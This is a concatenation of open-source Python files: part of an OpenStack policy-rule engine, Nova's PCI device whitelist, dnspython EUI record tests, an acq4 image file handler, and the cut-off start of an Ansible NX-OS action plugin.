def __init__(self, policy_file=None, rules=None,
default_rule=None, use_conf=True):
self.rules = Rules(rules, default_rule)
self.default_rule = default_rule or CONF.policy_default_rule
self.policy_path = None
self.policy_file = policy_file or CONF.policy_file
self.use_conf = use_conf
def set_rules(self, rules, overwrite=True, use_conf=False):
"""Create a new Rules object based on the provided dict of rules.
:param rules: New rules to use. It should be an instance of dict.
:param overwrite: Whether to overwrite current rules or update them
with the new rules.
:param use_conf: Whether to reload rules from cache or config file.
"""
if not isinstance(rules, dict):
raise TypeError(_("Rules must be an instance of dict or Rules, "
"got %s instead") % type(rules))
self.use_conf = use_conf
if overwrite:
self.rules = Rules(rules, self.default_rule)
else:
self.rules.update(rules)
def clear(self):
"""Clears Enforcer rules, policy's cache and policy's path."""
self.set_rules({})
fileutils.delete_cached_file(self.policy_path)
self.default_rule = None
self.policy_path = None
def load_rules(self, force_reload=False):
"""Loads policy_path's rules.
Policy file is cached and will be reloaded if modified.
:param force_reload: Whether to overwrite current rules.
"""
if force_reload:
self.use_conf = force_reload
if self.use_conf:
if not self.policy_path:
self.policy_path = self._get_policy_path(self.policy_file)
self._load_policy_file(self.policy_path, force_reload)
for path in CONF.policy_dirs:
try:
path = self._get_policy_path(path)
except cfg.ConfigFilesNotFoundError:
LOG.warn(_LW("Can not find policy directories %s"), path)
continue
self._walk_through_policy_directory(path,
self._load_policy_file,
force_reload, False)
def _walk_through_policy_directory(self, path, func, *args):
# We do not iterate over sub-directories.
policy_files = next(os.walk(path))[2]
policy_files.sort()
for policy_file in [p for p in policy_files if not p.startswith('.')]:
func(os.path.join(path, policy_file), *args)
def _load_policy_file(self, path, force_reload, overwrite=True):
reloaded, data = fileutils.read_cached_file(
path, force_reload=force_reload)
if reloaded or not self.rules:
rules = Rules.load_json(data, self.default_rule)
self.set_rules(rules, overwrite)
LOG.debug("Rules successfully reloaded")
def _get_policy_path(self, path):
"""Locate the policy json data file/path.
:param path: Its value can be a full path or a relative path. When a
full path is specified, this function just returns it. When a
relative path is specified, this function searches the
configuration directories for one that exists.
:returns: The policy path
:raises: ConfigFilesNotFoundError if the file/path couldn't
be located.
"""
policy_path = CONF.find_file(path)
if policy_path:
return policy_path
raise cfg.ConfigFilesNotFoundError((path,))
def enforce(self, rule, target, creds, do_raise=False,
exc=None, *args, **kwargs):
"""Checks authorization of a rule against the target and credentials.
:param rule: A string or BaseCheck instance specifying the rule
to evaluate.
:param target: As much information about the object being operated
on as possible, as a dictionary.
:param creds: As much information about the user performing the
action as possible, as a dictionary.
:param do_raise: Whether to raise an exception or not if check
fails.
:param exc: Class of the exception to raise if the check fails.
Any remaining arguments passed to enforce() (both
positional and keyword arguments) will be passed to
the exception class. If not specified, PolicyNotAuthorized
will be used.
:return: Returns False if the policy does not allow the action and
exc is not provided; otherwise, returns a value that
evaluates to True. Note: for rules using the "case"
expression, this True value will be the specified string
from the expression.
"""
self.load_rules()
# Allow the rule to be a Check tree
if isinstance(rule, BaseCheck):
result = rule(target, creds, self)
elif not self.rules:
# No rules to reference means we're going to fail closed
result = False
else:
try:
# Evaluate the rule
result = self.rules[rule](target, creds, self)
except KeyError:
LOG.debug("Rule [%s] doesn't exist" % rule)
# If the rule doesn't exist, fail closed
result = False
# If it is False, raise the exception if requested
if do_raise and not result:
if exc:
raise exc(*args, **kwargs)
raise PolicyNotAuthorized(rule)
return result
@six.add_metaclass(abc.ABCMeta)
class BaseCheck(object):
"""Abstract base class for Check classes."""
@abc.abstractmethod
def __str__(self):
"""String representation of the Check tree rooted at this node."""
pass
@abc.abstractmethod
def __call__(self, target, cred, enforcer):
"""Triggers if instance of the class is called.
Performs the check. Returns False to reject the access or a
true value (not necessarily True) to accept the access.
"""
pass
class FalseCheck(BaseCheck):
"""A policy check that always returns False (disallow)."""
def __str__(self):
"""Return a string representation of this check."""
return "!"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return False
class TrueCheck(BaseCheck):
"""A policy check that always returns True (allow)."""
def __str__(self):
"""Return a string representation of this check."""
return "@"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return True
class Check(BaseCheck):
"""A base class to allow for user-defined policy checks."""
def __init__(self, kind, match):
"""Initiates Check instance.
:param kind: The kind of the check, i.e., the field before the
':'.
:param match: The match of the check, i.e., the field after
the ':'.
"""
self.kind = kind
self.match = match
def __str__(self):
"""Return a string representation of this check."""
return "%s:%s" % (self.kind, self.match)
class NotCheck(BaseCheck):
"""Implements the "not" logical operator.
A policy check that inverts the result of another policy check.
"""
def __init__(self, rule):
"""Initialize the 'not' check.
:param rule: The rule to negate. Must be a Check.
"""
self.rule = rule
def __str__(self):
"""Return a string representation of this check."""
return "not %s" % self.rule
def __call__(self, target, cred, enforcer):
"""Check the policy.
Returns the logical inverse of the wrapped check.
"""
return not self.rule(target, cred, enforcer)
class AndCheck(BaseCheck):
"""Implements the "and" logical operator.
A policy check that requires that a list of other checks all return True.
"""
def __init__(self, rules):
"""Initialize the 'and' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' and '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that all rules accept in order to return True.
"""
for rule in self.rules:
if not rule(target, cred, enforcer):
return False
return True
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the AndCheck object for convenience.
"""
self.rules.append(rule)
return self
class OrCheck(BaseCheck):
"""Implements the "or" operator.
A policy check that requires that at least one of a list of other
checks returns True.
"""
def __init__(self, rules):
"""Initialize the 'or' check.
:param rules: A list of rules that will be tested.
"""
self.rules = rules
def __str__(self):
"""Return a string representation of this check."""
return "(%s)" % ' or '.join(str(r) for r in self.rules)
def __call__(self, target, cred, enforcer):
"""Check the policy.
Requires that at least one rule accept in order to return True.
"""
for rule in self.rules:
if rule(target, cred, enforcer):
return True
return False
def add_check(self, rule):
"""Adds rule to be tested.
Allows addition of another rule to the list of rules that will
be tested. Returns the OrCheck object for convenience.
"""
self.rules.append(rule)
return self
def _parse_check(rule):
"""Parse a single base check rule into an appropriate Check object."""
# Handle the special checks
if rule == '!':
return FalseCheck()
elif rule == '@':
return TrueCheck()
try:
kind, match = rule.split(':', 1)
except Exception:
LOG.exception(_LE("Failed to understand rule %s") % rule)
# If the rule is invalid, we'll fail closed
return FalseCheck()
# Find what implements the check
if kind in _checks:
return _checks[kind](kind, match)
elif None in _checks:
return _checks[None](kind, match)
else:
LOG.error(_LE("No handler for matches of kind %s") % kind)
return FalseCheck()
def _parse_list_rule(rule):
"""Translates the old list-of-lists syntax into a tree of Check objects.
Provided for backwards compatibility.
"""
# Empty rule defaults to True
if not rule:
return TrueCheck()
# Outer list is joined by "or"; inner list by "and"
or_list = []
for inner_rule in rule:
# Elide empty inner lists
if not inner_rule:
continue
# Handle bare strings
if isinstance(inner_rule, six.string_types):
inner_rule = [inner_rule]
# Parse the inner rules into Check objects
and_list = [_parse_check(r) for r in inner_rule]
# Append the appropriate check to the or_list
if len(and_list) == 1:
or_list.append(and_list[0])
else:
or_list.append(AndCheck(and_list))
# If we have only one check, omit the "or"
if not or_list:
return FalseCheck()
elif len(or_list) == 1:
return or_list[0]
return OrCheck(or_list)
# Used for tokenizing the policy language
_tokenize_re = re.compile(r'\s+')
def _parse_tokenize(rule):
"""Tokenizer for the policy language.
Most of the single-character tokens are specified in the
_tokenize_re; however, parentheses need to be handled specially,
because they can appear inside a check string. Thankfully, those
parentheses that appear inside a check string can never occur at
the very beginning or end ("%(variable)s" is the correct syntax).
"""
for tok in _tokenize_re.split(rule):
# Skip empty tokens
if not tok or tok.isspace():
continue
# Handle leading parens on the token
clean = tok.lstrip('(')
for i in range(len(tok) - len(clean)):
yield '(', '('
# If it was only parentheses, continue
if not clean:
continue
else:
tok = clean
# Handle trailing parens on the token
clean = tok.rstrip(')')
trail = len(tok) - len(clean)
# Yield the cleaned token
lowered = clean.lower()
if lowered in ('and', 'or', 'not'):
# Special tokens
yield lowered, clean
elif clean:
# Not a special token, but not composed solely of ')'
if len(tok) >= 2 and ((tok[0], tok[-1]) in
[('"', '"'), ("'", "'")]):
# It's a quoted string
yield 'string', tok[1:-1]
else:
yield 'check', _parse_check(clean)
# Yield the trailing parens
for i in range(trail):
yield ')', ')'
class ParseStateMeta(type):
"""Metaclass for the ParseState class.
Facilitates identifying reduction methods.
"""
def __new__(mcs, name, bases, cls_dict):
"""Create the class.
Injects the 'reducers' list, a list of tuples matching token sequences
to the names of the corresponding reduction methods.
"""
reducers = []
for key, value in cls_dict.items():
if not hasattr(value, 'reducers'):
continue
for reduction in value.reducers:
reducers.append((reduction, key))
cls_dict['reducers'] = reducers
return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)
def reducer(*tokens):
"""Decorator for reduction methods.
Arguments are a sequence of tokens, in order, which should trigger running
this reduction method.
"""
def decorator(func):
# Make sure we have a list of reducer sequences
if not hasattr(func, 'reducers'):
func.reducers = []
# Add the tokens to the list of reducer sequences
func.reducers.append(list(tokens))
return func
return decorator
@six.add_metaclass(ParseStateMeta)
class ParseState(object):
"""Implement the core of parsing the policy language.
Uses a greedy reduction algorithm to reduce a sequence of tokens into
a single terminal, the value of which will be the root of the Check tree.
Note: error reporting is rather lacking. The best we can get with
this parser formulation is an overall "parse failed" error.
Fortunately, the policy language is simple enough that this
shouldn't be that big a problem.
"""
def __init__(self):
"""Initialize the ParseState."""
self.tokens = []
self.values = []
def reduce(self):
"""Perform a greedy reduction of the token stream.
If a reducer method matches, it will be executed, then the
reduce() method will be called recursively to search for any more
possible reductions.
"""
for reduction, methname in self.reducers:
if (len(self.tokens) >= len(reduction) and
self.tokens[-len(reduction):] == reduction):
# Get the reduction method
meth = getattr(self, methname)
# Reduce the token stream
results = meth(*self.values[-len(reduction):])
# Update the tokens and values
self.tokens[-len(reduction):] = [r[0] for r in results]
self.values[-len(reduction):] = [r[1] for r in results]
# Check for any more reductions
return self.reduce()
def shift(self, tok, value):
"""Adds one more token to the state. Calls reduce()."""
self.tokens.append(tok)
self.values.append(value)
# Do a greedy reduce...
self.reduce()
@property
def result(self):
"""Obtain the final result of the parse.
Raises ValueError if the parse failed to reduce to a single result.
"""
if len(self.values) != 1:
raise ValueError("Could not parse rule")
return self.values[0]
@reducer('(', 'check', ')')
@reducer('(', 'and_expr', ')')
@reducer('(', 'or_expr', ')')
def _wrap_check(self, _p1, check, _p2):
"""Turn parenthesized expressions into a 'check' token."""
return [('check', check)]
@reducer('check', 'and', 'check')
def _make_and_expr(self, check1, _and, check2):
"""Create an 'and_expr'.
Join two checks by the 'and' operator.
"""
return [('and_expr', AndCheck([check1, check2]))]
@reducer('and_expr', 'and', 'check')
def _extend_and_expr(self, and_expr, _and, check):
"""Extend an 'and_expr' by adding one more check."""
return [('and_expr', and_expr.add_check(check))]
@reducer('check', 'or', 'check')
def _make_or_expr(self, check1, _or, check2):
"""Create an 'or_expr'.
Join two checks by the 'or' operator.
"""
return [('or_expr', OrCheck([check1, check2]))]
@reducer('or_expr', 'or', 'check')
def _extend_or_expr(self, or_expr, _or, check):
"""Extend an 'or_expr' by adding one more check."""
return [('or_expr', or_expr.add_check(check))]
@reducer('not', 'check')
def _make_not_expr(self, _not, check):
"""Invert the result of another check."""
return [('check', NotCheck(check))]
def _parse_text_rule(rule):
"""Parses policy to the tree.
Translates a policy written in the policy language into a tree of
Check objects.
"""
# Empty rule means always accept
if not rule:
return TrueCheck()
# Parse the token stream
state = ParseState()
for tok, value in _parse_tokenize(rule):
state.shift(tok, value)
try:
return state.result
except ValueError:
# Couldn't parse the rule
LOG.exception(_LE("Failed to understand rule %s") % rule)
# Fail closed
return FalseCheck()
def parse_rule(rule):
"""Parses a policy rule into a tree of Check objects."""
# If the rule is a string, it's in the policy language
if isinstance(rule, six.string_types):
return _parse_text_rule(rule)
return _parse_list_rule(rule)
def register(name, func=None):
"""Register a function or Check class as a policy check.
:param name: Gives the name of the check type, e.g., 'rule',
'role', etc. If name is None, a default check type
will be registered.
:param func: If given, provides the function or class to register.
If not given, returns a function taking one argument
to specify the function or class to register,
allowing use as a decorator.
"""
# Perform the actual decoration by registering the function or
# class. Returns the function or class for compliance with the
# decorator interface.
def decorator(func):
_checks[name] = func
return func
# If the function or class is given, do the registration
if func:
return decorator(func)
return decorator
@register("rule")
class RuleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Recursively checks credentials based on the defined rules."""
try:
return enforcer.rules[self.match](target, creds, enforcer)
except KeyError:
# We don't have any matching rule; fail closed
return False
@register("role")
class RoleCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check that there is a matching role in the cred dict."""
return self.match.lower() in [x.lower() for x in creds['roles']]
@register('http')
class HttpCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check http: rules by calling to a remote server.
This example implementation simply verifies that the response
is exactly 'True'.
"""
url = ('http:' + self.match) % target
data = {'target': jsonutils.dumps(target),
'credentials': jsonutils.dumps(creds)}
post_data = urlparse.urlencode(data)
f = urlrequest.urlopen(url, post_data)
return f.read() == "True"
@register(None)
class GenericCheck(Check):
def __call__(self, target, creds, enforcer):
"""Check an individual match.
Matches look like:
tenant:%(tenant_id)s
role:compute:admin
True:%(user.enabled)s
'Member':%(role.name)s
"""
try:
match = self.match % target
except KeyError:
# If the key is not present in the target, GenericCheck fails closed (returns False).
return False
try:
# Try to interpret self.kind as a literal
leftval = ast.literal_eval(self.kind)
except ValueError:
try:
kind_parts = self.kind.split('.')
leftval = creds
for kind_part in kind_parts:
leftval = leftval[kind_part]
except KeyError:
return False
return match == six.text_type(leftval)
| apache-2.0 |
JioCloud/nova_test_latest | nova/pci/whitelist.py | 35 | 4103 | # Copyright (c) 2013 Intel, Inc.
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from nova import exception
from nova.i18n import _
from nova.pci import devspec
pci_opts = [cfg.MultiStrOpt('pci_passthrough_whitelist',
default=[],
help='White list of PCI devices available to VMs. '
'For example: pci_passthrough_whitelist = '
'[{"vendor_id": "8086", "product_id": "0443"}]'
)
]
CONF = cfg.CONF
CONF.register_opts(pci_opts)
LOG = logging.getLogger(__name__)
class PciHostDevicesWhiteList(object):
"""White list class to decide assignable pci devices.
Not all devices on a compute node can be assigned to a guest; the
cloud administrator decides which devices can be assigned
based on vendor_id, product_id, etc. If no white list is specified,
no device will be assignable.
"""
def _parse_white_list_from_config(self, whitelists):
"""Parse and validate the pci whitelist from the nova config."""
specs = []
for jsonspec in whitelists:
try:
dev_spec = jsonutils.loads(jsonspec)
except ValueError:
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'") % jsonspec)
if isinstance(dev_spec, dict):
dev_spec = [dev_spec]
elif not isinstance(dev_spec, list):
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'; "
"Expecting list or dict") % jsonspec)
for ds in dev_spec:
if not isinstance(ds, dict):
raise exception.PciConfigInvalidWhitelist(
reason=_("Invalid entry: '%s'; "
"Expecting dict") % ds)
spec = devspec.PciDeviceSpec(ds)
specs.append(spec)
return specs
def __init__(self, whitelist_spec=None):
"""White list constructor
For example, the following JSON string specifies that devices whose
vendor_id is '8086' and product_id is '1520' can be assigned
to a guest.
'[{"product_id":"1520", "vendor_id":"8086"}]'
:param whitelist_spec: A json string for a list of dictionaries,
each dictionary specifies the pci device
properties requirement.
"""
super(PciHostDevicesWhiteList, self).__init__()
if whitelist_spec:
self.specs = self._parse_white_list_from_config(whitelist_spec)
else:
self.specs = []
def device_assignable(self, dev):
"""Check if a device can be assigned to a guest.
:param dev: A dictionary describing the device properties
"""
for spec in self.specs:
if spec.match(dev):
return spec
def get_devspec(self, pci_dev):
for spec in self.specs:
if spec.match_pci_obj(pci_dev):
return spec
def get_pci_devices_filter():
return PciHostDevicesWhiteList(CONF.pci_passthrough_whitelist)
def get_pci_device_devspec(pci_dev):
dev_filter = get_pci_devices_filter()
return dev_filter.get_devspec(pci_dev)
| apache-2.0 |
cloudera/hue | desktop/core/ext-py/dnspython-1.15.0/tests/test_rdtypeanyeui.py | 4 | 9292 | # Copyright (C) 2015 Red Hat, Inc.
# Author: Petr Spacek <[email protected]>
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' AND RED HAT DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
try:
import unittest2 as unittest
except ImportError:
import unittest
from io import BytesIO
import dns.rrset
import dns.rdtypes.ANY.EUI48
import dns.rdtypes.ANY.EUI64
import dns.exception
class RdtypeAnyEUI48TestCase(unittest.TestCase):
def testInstOk(self):
'''Valid binary input.'''
eui = b'\x01\x23\x45\x67\x89\xab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
self.assertEqual(inst.eui, eui)
def testInstLength(self):
'''Incorrect input length.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd'
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
def testFromTextOk(self):
'''Valid text input.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'EUI48',
'01-23-45-67-89-ab')
eui = b'\x01\x23\x45\x67\x89\xab'
self.assertEqual(r1[0].eui, eui)
def testFromTextLength(self):
'''Invalid input length.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48',
'00-01-23-45-67-89-ab')
def testFromTextDelim(self):
'''Invalid delimiter.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '01_23-45-67-89-ab')
def testFromTextExtraDash(self):
'''Extra dash instead of hex digit.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '0--23-45-67-89-ab')
def testFromTextMultipleTokens(self):
'''Invalid input divided to multiple tokens.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', '01 23-45-67-89-ab')
def testFromTextInvalidHex(self):
'''Invalid hexadecimal input.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI48', 'g0-23-45-67-89-ab')
def testToTextOk(self):
'''Valid text output.'''
eui = b'\x01\x23\x45\x67\x89\xab'
exp_text = '01-23-45-67-89-ab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
text = inst.to_text()
self.assertEqual(exp_text, text)
def testToWire(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab'
inst = dns.rdtypes.ANY.EUI48.EUI48(dns.rdataclass.IN,
dns.rdatatype.EUI48,
eui)
buff = BytesIO()
inst.to_wire(buff)
self.assertEqual(buff.getvalue(), eui)
def testFromWireOk(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
inst = dns.rdtypes.ANY.EUI48.EUI48.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI48,
wire,
pad_len,
len(eui))
self.assertEqual(inst.eui, eui)
def testFromWireLength(self):
        '''Invalid wire length.'''
eui = b'\x01\x23\x45\x67\x89'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI48.EUI48.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI48,
wire,
pad_len,
len(eui))
class RdtypeAnyEUI64TestCase(unittest.TestCase):
def testInstOk(self):
'''Valid binary input.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
self.assertEqual(inst.eui, eui)
def testInstLength(self):
'''Incorrect input length.'''
eui = b'\x01\x23\x45\x67\x89\xab'
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
def testFromTextOk(self):
'''Valid text input.'''
r1 = dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01-23-45-67-89-ab-cd-ef')
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
self.assertEqual(r1[0].eui, eui)
def testFromTextLength(self):
'''Invalid input length.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01-23-45-67-89-ab')
def testFromTextDelim(self):
'''Invalid delimiter.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01_23-45-67-89-ab-cd-ef')
def testFromTextExtraDash(self):
'''Extra dash instead of hex digit.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'0--23-45-67-89-ab-cd-ef')
def testFromTextMultipleTokens(self):
'''Invalid input divided to multiple tokens.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'01 23-45-67-89-ab-cd-ef')
def testFromTextInvalidHex(self):
'''Invalid hexadecimal input.'''
with self.assertRaises(dns.exception.SyntaxError):
dns.rrset.from_text('foo', 300, 'IN', 'EUI64',
'g0-23-45-67-89-ab-cd-ef')
def testToTextOk(self):
'''Valid text output.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
exp_text = '01-23-45-67-89-ab-cd-ef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
text = inst.to_text()
self.assertEqual(exp_text, text)
def testToWire(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
inst = dns.rdtypes.ANY.EUI64.EUI64(dns.rdataclass.IN,
dns.rdatatype.EUI64,
eui)
buff = BytesIO()
inst.to_wire(buff)
self.assertEqual(buff.getvalue(), eui)
def testFromWireOk(self):
'''Valid wire format.'''
eui = b'\x01\x23\x45\x67\x89\xab\xcd\xef'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
inst = dns.rdtypes.ANY.EUI64.EUI64.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI64,
wire,
pad_len,
len(eui))
self.assertEqual(inst.eui, eui)
def testFromWireLength(self):
        '''Invalid wire length.'''
eui = b'\x01\x23\x45\x67\x89'
pad_len = 100
wire = dns.wiredata.WireData(b'x' * pad_len + eui + b'y' * pad_len * 2)
with self.assertRaises(dns.exception.FormError):
dns.rdtypes.ANY.EUI64.EUI64.from_wire(dns.rdataclass.IN,
dns.rdatatype.EUI64,
wire,
pad_len,
len(eui))
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
mgraupe/acq4 | acq4/filetypes/ImageFile.py | 4 | 5498 | # -*- coding: utf-8 -*-
from PIL import Image
## Install support for 16-bit images in PIL
if Image.VERSION == '1.1.7':
Image._MODE_CONV["I;16"] = ('%su2' % Image._ENDIAN, None)
Image._fromarray_typemap[((1, 1), "<u2")] = ("I", "I;16")
if Image.VERSION == '1.1.6':
Image._MODE_CONV["I;16"] = ('%su2' % Image._ENDIAN, None)
## just a copy of fromarray() from Image.py with I;16 added in
def fromarray(obj, mode=None):
arr = obj.__array_interface__
shape = arr['shape']
ndim = len(shape)
try:
strides = arr['strides']
except KeyError:
strides = None
if mode is None:
typestr = arr['typestr']
if not (typestr[0] == '|' or typestr[0] == Image._ENDIAN or
typestr[1:] not in ['u1', 'b1', 'i4', 'f4']):
raise TypeError("cannot handle data-type")
if typestr[0] == Image._ENDIAN:
typestr = typestr[1:3]
else:
typestr = typestr[:2]
if typestr == 'i4':
mode = 'I'
            elif typestr == 'u2':
mode = 'I;16'
elif typestr == 'f4':
mode = 'F'
elif typestr == 'b1':
mode = '1'
elif ndim == 2:
mode = 'L'
elif ndim == 3:
mode = 'RGB'
elif ndim == 4:
mode = 'RGBA'
else:
raise TypeError("Do not understand data.")
ndmax = 4
bad_dims=0
if mode in ['1','L','I','P','F']:
ndmax = 2
elif mode == 'RGB':
ndmax = 3
if ndim > ndmax:
raise ValueError("Too many dimensions.")
size = shape[:2][::-1]
if strides is not None:
obj = obj.tostring()
        return Image.frombuffer(mode, size, obj, "raw", mode, 0, 1)
Image.fromarray=fromarray
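# Editor's note -- hedged example, not part of upstream acq4: with the I;16
# support installed above, a 16-bit unsigned numpy array should map to PIL
# mode 'I;16' on these old PIL versions (1.1.6/1.1.7), e.g.:
#     import numpy as np
#     img16 = Image.fromarray(np.zeros((16, 16), dtype=np.uint16))  # mode 'I;16'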
#import png ## better png support than PIL
from numpy import array, ndarray
from acq4.util.metaarray import MetaArray as MA
from FileType import *
#import libtiff
#from PyQt4 import QtCore, QtGui
class Array(ndarray): ## just allows us to add some dynamic attributes
def __new__(cls, arr):
return arr.view(cls)
class ImageFile(FileType):
extensions = ['.png', '.tif', '.jpg'] ## list of extensions handled by this class
dataTypes = [MA, ndarray] ## list of python types handled by this class
priority = 50 ## medium priority; MetaArray should be used for writing arrays if possible;
@classmethod
def write(cls, data, dirHandle, fileName, **args):
"""Write data to fileName.
Return the file name written (this allows the function to modify the requested file name)
"""
fileName = cls.addExtension(fileName)
ext = os.path.splitext(fileName)[1].lower()[1:]
img = Image.fromarray(data.transpose())
img.save(os.path.join(dirHandle.name(), fileName))
#if ext in ['tif', 'tiff']:
#d = data.transpose()
#tiff = libtiff.TIFFimage(d, description='')
#tiff.write_file(os.path.join(dirHandle.name(), fileName), compression='none')
#else:
#ims = data.tostring()
#img = QtGui.QImage(buffer(ims), data.shape[1], data.shape[0], QtGui.QImage.Format_ARGB32)
#w = QtGui.QImageWriter(os.path.join(dirHandle.name(), fileName), ext)
#w.write(img)
return fileName
@classmethod
def read(cls, fileHandle):
"""Read a file, return a data object"""
img = Image.open(fileHandle.name())
arr = array(img)
if arr.ndim == 0:
raise Exception("Image has no data. Either 1) this is not a valid image or 2) PIL does not support this image type.")
#ext = os.path.splitext(fileHandle.name())[1].lower()[1:]
#if ext in ['tif', 'tiff']:
#tif = libtiff.TIFFfile(fileHandle.name())
#samples, sample_names = tif.get_samples()
#if len(samples) != 1:
#arr = np.concatenate(samples)
#else:
#arr = samples[0]
#else:
#img = QtGui.QImage()
#img.load(fileHandle.name())
#ptr = img.bits()
#ptr.setsize(img.byteCount())
#buf = buffer(ptr, 0, img.byteCount())
#arr = np.frombuffer(buf, dtype=np.ubyte)
#arr.shape = (img.height(), img.width(), img.depth() / 8)
transp = range(arr.ndim) ## switch axis order y,x to x,y
if arr.ndim == 2:
transp[0] = 1
transp[1] = 0
axisHint = ['x', 'y']
elif arr.ndim == 3:
if len(img.getbands()) > 1:
transp[0] = 1
transp[1] = 0
axisHint = ['x', 'y']
else:
transp[1] = 2
transp[2] = 1
axisHint = ['t', 'x', 'y']
elif arr.ndim == 4:
transp[1] = 2
transp[2] = 1
axisHint = ['t', 'x', 'y']
else:
raise Exception("Bad image size: %s" % str(arr.ndim))
#print arr.shape
arr = arr.transpose(tuple(transp))
axisHint.append(img.getbands())
arr = Array(arr) ## allow addition of new attributes
        arr.axisHint = axisHint
#print arr.shape
return arr
| mit |
valentin-krasontovitsch/ansible | lib/ansible/plugins/action/nxos.py | 12 | 7412 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import copy
import re
import sys
from ansible import constants as C
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection
from ansible.plugins.action.network import ActionModule as ActionNetworkModule
from ansible.module_utils.network.common.utils import load_provider
from ansible.module_utils.network.nxos.nxos import nxos_provider_spec
from ansible.utils.display import Display
display = Display()
class ActionModule(ActionNetworkModule):
def run(self, tmp=None, task_vars=None):
del tmp # tmp no longer has any effect
self._config_module = True if self._task.action == 'nxos_config' else False
socket_path = None
